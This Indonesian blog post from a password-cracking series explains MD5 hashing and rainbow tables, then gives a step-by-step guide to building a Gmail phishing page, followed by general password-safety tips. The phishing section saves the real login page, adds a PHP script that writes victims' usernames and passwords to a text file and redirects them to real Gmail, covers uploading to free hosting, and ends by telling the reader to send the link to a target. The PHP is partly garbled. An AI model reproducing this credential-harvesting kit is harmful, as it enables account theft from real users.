Breaking News
Loading...
Kamis, 21 Januari 2016

Chapter #4 Password ( Part B )

21.44


Rainbow Table

Rainbow table adalah daftar pra-hitung besar nilai hash untuk setiap kemungkinan kombinasi karakter. Hash password adalah password yang telah melalui algoritma matematika yang ditransformasikan menjadi sesuatu yang benar-benar asing. Hash adalah  transformasi aritmatik sebuah string dari karakter menjadi nilai yang merepresentasikan string aslinya. Sebuah algoritma hashing yang sangat umum digunakan sebagai jaminan untuk menyimpan password di database website adalah MD5.
Katakanlah Anda mendaftar pada sebuah situs web. Anda masukkan username dan password. Sekarang ketika anda mengirimkannya, password akan berjalan melalui algoritma MD5 dan hasil hash disimpan dalam database. Sekarang karena anda tidak bisa mendapatkan password dari hash, anda mungkin bertanya-tanya bagaimana mereka tahu jika password anda tepat ketika anda login. Nah ketika Anda login dan memasukkan username serta password anda, sebuah script mengambil sandi dan berjalan melalui algoritma md5. Hasil hash dibandingkan dengan hash yang tersimpan dalam database. Jika mereka adalah sama, maka anda berhasil untuk login kea kun anda.
Jika saya harus menjalankan kata "bangsat" melalui algoritma MD5, hasilnya akan menjadi seperti ini : 528f980649c80a7269402447b51e815a. Memiliki setiap kombinasi karakter  hash adalah cara alternatif yang jauh lebih baik untuk mencoba cracking brute force. Setelah Rainbow table tercipta, cracking password telah meningkat seratus kali lebih cepat dari pada brute-force.
 Saya akan menunjukkan contoh cracking Rainbow table ketika kita masuk ke chapter Windows password cracking di artikel lainya.

Phishing

Phishing  adalah proses mencuri informasi sensitif, seperti username, password, dan informasi bank, dengan berpura-pura menjadi sesuatu yang tidak asing bagi korban. Contoh, anda menerima sebuah  email dari seorang hacker yang berpura-pura menjadi admin bank dimana anda menjadi salah satu nasabahnya. Dalam e-mail, mungkin anda diberitahu bahwa anda harus memperbarui account anda sebelum kadaluarsa, dan kemudian hacker menyediakan link. Setelah anda mengklik pada link, anda tiba di sebuah website yang terlihat persis seperti halaman bank yang sebenarnya. Pada kenyataannya itu hanya replika yang sempurna, dan ketika anda masukan rincian login anda, rincian tersebut  akan mengirimkannya ke server web replik yang anda klik tadi. Menjadi Hacker yang bisa menciptakan tekhnik seperti ini cukup mudah, syaratnya anda harus paham di bidang HTML dan pemrograman PHP. Di bawah ini saya akan menunjukkan contoh sederhana beberapa langkah-langkah Hacker untuk membuat website phishing. Dengan melihat langkah-langkah seperti ini pula dapat membantu anda mempertahankan akun anda dari serangan seorang Hacker ahli phising.

1. Pertama pilihlah target. Target yang paling recommendate  untuk serangan phishing adalah layanan email seperti Hotmail dan Gmail, alasanya sederhana, karena kedua email ini sifatnya umum dan banyak digunakan berbagai kalangan. Ketika berhasil masuk anda juga akan melihat dimana saja email ini terkait. Entah dia menggunakan untuk facebook atau bahkan Paypal kita akan mengetahuinya, sekali memancing tiga empat lima enam ikan tertangkap.
 
2. Setelah memilih targetnya, pergi
lah ke situs web dan simpan seluruh  halaman utamanya. Saya menggunakan Mozilla Firefox, (sangat merekomendasikan menggunakan browser ini untuk keamanan dan kustomisasi.) Jadi saya akan pergi ke www.gmail.com dan klik File -> Simpan Save As ..., atau cukup tekan <CTRL> + S agar tersimpan secara otomatis . Pilih mana Anda ingin menyimpan halaman web dan tekan Simpan.


3. Setelah anda simpan, ubah nama ServiceLogin.html  menjadi  index.html. Kenapa saya menganjurkan namanya menjadi  "index"  fungsinya agar  ketika anda meng-upload ke web host dan seseorang pergi ke link anda,maka  halaman indeks adalah halaman pertama yang akan muncul.
4. Berikutnya membuat script PH
P. Di bawah ini adalah script PHP sederhana yang akan menjadi log rincian login anda ketika seseorang  klik "Sign in". Untuk melihat cara kerjanya, copy dan paste kode berikut ke notepad. Berikutnya simpan ke dalam direktori yang sama seperti anda menyimpan halaman Gmail tadi, dan beri nama itu phish.php. Setelah membuat  halaman phish.php, buat file teks kosong baru dan beri nama list.txt.

 ini menandai awal dari script PHP.
Header ("Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 "); //  Setelah Anda klik "Sign in" di website palsu, ini mengarahkan Anda ke situs web Gmail nyata, membuat seluruh proses tampak lebih manis.
$handle = fopen ("list.txt", "a"); //  Ini fungsinya memberitahu server untuk membuka file "list.txt" dan siap untuk menampung data. Yang dalam hal ini adalah username dan password koban.
Foreach ($ _ GET $variabel=> $ value) {
fwrite ($ handle, $ variabel);
fwrite ($ handle, "=");
fwrite ($ handle, $ value);
fwrite ($ handle, "\ r \ n");
} // Bagian ini hanya memberikan semua informasi melalui formulir ini secara variabel. Ini termasuk nama pengguna dan password korban.
Fwrite ($ handle, "\ r \ n"); // Ini menulis rincian Anda ke file "list.txt"
fclose ($ handle); // Ini hanya menutup koneksi ke file "list.txt"
out;
?> // Menandai akhir program PHP.

Sejauh ini anda akan melihat file berikut dalam folder anda:


5. Sekarang edit sedikit halaman Gmail utama [index] untuk menyertakan file PHP nya. Untuk mengeditnya, buka halaman Gmail utama bernama index.html dengan notepad.
6.
Tekan  <CTRL> + F, atau pergi ke Edit -> Find, ketik action dan tekan "Find Next".


 
7. Ini akan menyoroti memblok kata pertama dari  "action" dalam naskah dan anda akan melihat hal berikut:

Ada dua kata "action" di script jadi pastikan anda memiliki kata yang tepat dengan melihat "form id" nama di atas. Ubah link antara action = "" untuk phish.php. Ini akan membuat form submit ke naskah phish PHP Anda, bukan ke Google. Setelah link Anda akan melihat kode:
Ubah kata "POST" menjadi "GET" sehingga terlihat seperti metode = "GET". Apa yang metode GET lakukan adalah mengirimkan informasi yang anda di ketik korban melalui URL sehingga rincian log nya akan masuk ke script PHP.

8. Simpan dan tutup file.
9. Berikutnya upload file ke hosting gratis yang mendukung PHP. Anda bisa mencaringa di sini.
10. Setelah semua file di-upload, anda ubah permissionsnya  untuk file "list.txt". Sort file dan cari CHMOD. Pilih opsi ini dan ubah izin file untuk "list.txt" ke 777. Jika Anda tidak tahu bagaimana melakukan ini, mintalah bantuan pada orang yang menggunakan hosting sama dengan anda atau carilah penyelesainya di Google dengan mengetik kata kunci : "yourwebhostname chmod".
11. Setelah semuanya dan siap, klik link hosting buatan anda untuk memastikan website anda sudah terlihat seperti halaman Gmail atau belum. Jika sudah, coba ketik username dan password dan lalu klik Sign in. Ini akan mengarahkan anda ke halaman Gmail yang nyata.
12. Sekarang pergilah ke cpanel hosting anda dan lihatlah berkas list.txt anda. Anda akan melihat rinciannya seperti berikut ini.


Email = myusername ( email yang saya buat untuk testing )
Password = mypassword ( password yang saya ketikkan bersama email tadi )
Seperti yang anda lihat diatas, data login yang saya ketik walaupun asal asalan tetap tersimpan disana kan, mantab jaya.
Langkah selanjutnya kirim link phising yang baru selesai anda buat ke sasaran anda sendiri.

Countermeasures ( Pencegahan )

Sekarang saya akan
tunjukkan semua tindakan pencegahan yang harus anda ambil untuk melindungi diri dari semua Crakcing Password Attack dalam artikel Chapter#4 Password Part A+B.

Social Engineering

Untuk melindungi diri dari serangan rekayasa sosial
atau bahasa jawanya Social engineering seperti ini, anda harus belajar untuk mempertanyakan maksud dari seseorang  tersebut langsung ke sumber terkait. Dalam contoh yang sudah saya tuliskan di artikel sebelumnya, ada baiknya anda memiliki contact langsung ke departemen terkait yang pada contoh adalah bank, maka setidaknya anda punya nomor telpon pusat bank tersebut. Jangan asal percaya dan langsung klik ini dan itu yang bisa mengakibatkan akun anda di bobol. Sedikit repot ? menurut saya tidak.Jika untuk keamanan kenapa tidak. Lebih baik aman daripada menyesal.

Shoulder Surfing

Ketika anda mengetikkan password anda, pastikan tidak ada satu orangpun dibelakang anda yang mungkin mencoba mengintip password anda. Jika ada, berbalik dan tendangan dia atau tonjok wajahnya. Juga, pastikan anda tidak menyimpan catatan tempel atau note pencatat  dimana anda menuliskan data anda terlihat di sembarang tempat, saran saya buatlah pawwrod dengan kata yang cukup rumit tapi mudah diingat dan mungkin tidak terpikirkan orang lain.

Guessing

Untuk mencegah serangan ini terjadi,
jangan pernah menggunakan password seperti tanggal lahir Anda, nama kecil ibu anda, nama hewan peliharaan Anda, nama pasangan Anda, atau apa pun yang seseorang mungkin bisa menebak.

Dictionary attacks

Dictionary attacks sangat sederhana untuk dicegah. Jangan gunakan password yang ada pada kamus kosakata. Beberapa orang mungkin berpikir bahwa jika mereka menggunakan sebuah kata dari kamus tetapi menggantikan sebagian besar huruf dengan angka, maka mereka aman. Mereka sungguh orang orang yang baik, password seperti itu tidak bisa mengatasi Dictionary attacks.  Seperti 4n1m41 untuk kata"Animal". Untuk password yang aman, saya akan merekomendasikan menggunakan frase seperti "tanggallahikkuberapahayo?100". sedikit konyol tapi lumayan dari pada di hack.

Brute force attact

Serangan brute force dapat dicegah dengan membuat password yang sangat panjang dan menggunakan banyak angka dan karakter aneh. Semakin lama password lama waktu yang dibutuhkan untuk hacker untuk memecahkan sandi Anda. Jika setelah beberapa hari hacker belum mampu memecahkan sandi anda melalui serangan brute-force, maka sangat mungkin dia akan menyerah. Seperti saya katakan dalam Dictionary attacks, menciptakan frase sandi unik adalah pilihan terbaik anda untuk aman.

Rainbow Tables

Sama seperti cara menghindari Brute Force Attact, anda dapat menghindari Rainbow Tables Cracking hanya  dengan membuat kata sandi yang sangat panjang dan teracak secara maksimal,misalnya “akucintakamupacarkuyanglahirtaun1999yangpunyaalamatemail@gmail.com” Hahahaha. Membuat tabel untuk password yang panjang membutuhkan waktu yang sangat lama dan membutuhkan banyak sumber daya. Sedikit gila yang penting aman.

Phising

Mengatsi serangan phishing sangatlah mudah. Ketika anda diminta untuk memasukkan informasi pribadi anda ke dalam sebuah situs web, lihat URL di adrees bar nya. Jika misalnya anda seharusnya berada di Gmail.com dan di bar URL itu mengatakan sesuatu yang sama sekali berbeda seperti gmail.randomsite.com, atau gamilmail.com, maka anda harus paham itu adalah palsu. Ketika Anda berada di situs Gmail nyata, URL harus dimulai dengan www.google.com dan URL nya terlihat berbeda bisa dipastikan itu adalah web Phising.

Tambahan

Pada beberapa chapter kedepan saya akan menggunakan dual os, baik windows dan linux akan saya bahas tapi tidak dalam satu tempat yang sama. Sekarang anda tahu apa saja metode cracking password, jika anda tertarik untuk belajar lebih banyak software cracking populer lainnya, anda  bisa kunjungi link di bawah ini:



 Happy hacking.

0 komentar:

 
Toggle Footer